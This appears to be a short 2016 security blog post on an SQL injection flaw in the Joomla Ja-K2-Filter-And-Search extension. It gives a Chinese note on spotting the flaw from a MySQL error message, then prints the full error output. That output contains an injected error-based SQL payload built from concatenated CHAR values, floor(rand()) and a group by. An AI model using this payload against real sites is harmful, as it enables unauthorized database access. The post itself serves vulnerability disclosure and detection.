Joomla Ja-K2-Filter-And-Search SQL Injection Vulnerability

October 20, 2016 • Security



输出结果,出现如下内容(包含:You have an error in your SQL syntax;)表示漏洞存在:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"') AND (i.fulltext LIKE '%the%') ORDER BY DESC LIMIT 0, 9' at line 1 SQL=SELECT DISTINCT i.*, CASE WHEN i.modified = 0 THEN i.created ELSE i.modified END as lastChanged, as categoryname, as categoryid, c.alias as categoryalias, c.params as categoryparams FROM #__k2_items as i RIGHT JOIN #__k2_categories AS c ON = i.catid WHERE i.published = 1 AND i.access IN(1,1,5) AND i.trash = 0 AND c.published = 1 AND c.access IN(1,1,5) AND c.trash = 0 AND ( i.publish_up = '0000-00-00 00:00:00' OR i.publish_up <= '2016-10-20 03:44:31' ) AND ( i.publish_down = '0000-00-00 00:00:00' OR i.publish_down >= '2016-10-20 03:44:31' ) AND i.catid IN ((select 1 and row(1, 1)>(select count(*), concat(concat(CHAR(52), CHAR(67), CHAR(117), CHAR(117), CHAR(82), CHAR(57), CHAR(71), CHAR(65), CHAR(77), CHAR(98), CHAR(77)), floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))) AND (i.extra_fields REGEXP '{"id":"2","value":[^{]*"5'"') AND (i.fulltext LIKE '%the%') ORDER BY DESC LIMIT 0, 9


Archives QR Code
QR Code for this page
Tipping QR Code